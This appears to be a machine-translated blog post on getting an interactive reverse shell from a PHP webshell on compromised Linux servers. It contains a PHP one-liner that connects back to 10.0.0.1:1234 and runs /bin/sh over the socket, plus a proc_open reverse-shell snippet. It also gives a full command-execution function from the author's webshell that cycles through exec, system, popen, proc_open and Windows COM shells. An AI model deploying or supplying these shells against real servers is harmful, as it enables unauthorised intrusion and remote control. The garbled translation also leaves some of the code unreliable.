Inux under, sometimes get Webshell need to raise power, the right to claim must be an interactive shell.
I looked at the commonly used PHP Webshell, there is no perfect way for command execution and bounce shell. Many Webshell do not have Proc_popen, popen these two ways, especially proc_popen, such as Phpspy.
In my collection of bounce-shell collections (http://tool.p1ng.pw/getshell.html), there is a way to enter at the command line:
1
Php-r ' $sock =fsockopen ("10.0.0.1", 1234); EXEC (/bin/sh-i <&3 >&3 2>&3); '
But there is a problem, if the Webshell in the code, the system will be the standard input and output redirect to the/bin/sh, resulting in the PHP-FPM Direct 502, and then the shell will instantly drop, this way is more rude. And my idea is: I just want to redirect the standard input output of my newly created process (/bin/sh) to the socket without moving the system thing.
When the system does not disable Proc_popen, we can use the Proc_popen easy rebound such a shell. Without the support of any other language, PHP is sufficient.
$sock = Fsockopen ($ip, $port);
$descriptorspec = Array (
0 => $sock,
1 => $sock,
2 => $sock
);
$process = Proc_open ('/bin/sh ', $descriptorspec, $pipes);
Proc_close ($process);
Where $ip is the rebound of IP, $port is the rebound port, which is my personal version of the Webshell in a small function:
38.jpg
Bounce Shell when the Web page will die, because PHP does not have asynchronous functions, the default does not support multithreading, so it is normal to stuck this phenomenon, does not affect the rebound shell.
But I tried, it doesn't seem to work perfectly under Windows. I do not know is my environmental problems (anti-virus software, etc.) or code problems. Silic's big horse has a Windows bounce feature that Windows can use:
39.jpg
For specific code, please view it in the Silic Webshell. I have not tried, do not know how success rate.
Attached to my Webshell function to execute the command, you reader can use the modified. Have to add, welcome to tell me AH ~
function Exec_comm ($cmd, & $type = ', & $suc = TRUE)
{
Set_error_handler ("Customerror");
$re = false;
if (empty ($cmd)) return to ' execution result ';
if (empty ($type)) {
if (function_exists (' exec ')) {
@exec ($cmd, $re);
$re = Join ("\ n", $re);
$type = ' EXEC ';
}else if (function_exists (' shell_exec ') && ($re = shell_exec ($cmd))) {
$type = ' shell_exec ';
}else if (function_exists (' system ')) {
@ob_start (); system ($cmd); $re = @get_ob_contents (); @ob_end_clean ();
$type = ' System ';
}else if (function_exists (' PassThru ')) {
@ob_start ();p assthru ($cmd); $re = @get_ob_contents (); @ob_end_clean ();
$type = ' PassThru ';
}else if (is_resource ($f = Popen ($cmd, "R"))) {
while (! @feof ($f)) {$re. = @fread ($f, 1024);} @pclose ($f);
$type = ' Popen ';
}else if (function_exists (' Proc_open ')) {
$descriptorspec = Array (
0 => Array ("Pipe", "R"),
1 => Array ("Pipe", "w"),
2 => Array ("Pipe", "w")
);
$process = Proc_open ($cmd, $descriptorspec, $pipes);
if (Is_resource ($process)) {
Fwrite ($pipes [0], "{$cmd}\r\n");
Fwrite ($pipes [0], "exit\r\n");
Fclose ($pipes [0]);
Read output
while (!feof ($pipes [1])) {
$re. = Fgets ($pipes [1], 1024);
}
Fclose ($pipes [1]);
while (!feof ($pipes [2])) {
$re. = Fgets ($pipes [2], 1024);
}
Fclose ($pipes [2]);
Proc_close ($process);
}
}
}else if ($type = = ' WScript ') {
$s = new COM (' Wscript.Shell ');
$exec = $s->exec ($cmd);
$stdout = $exec->stdout ();
$re = $stdout->readall ();
}else if ($type = = ' Application ') {
$exe = GPC (' exe ', ' post ', ' C:/windows/system32/cmd.exe ');
$shell = new COM (' shell.application ');
$shell->shellexecute ($exe, $cmd);
$re = "Please view input file contents in {$cmd} \ n";
}
if ($re = = False) {$re = ' command execution may fail, may be the execution function is disabled or performs no echo '; $suc = false;}
return $re;
}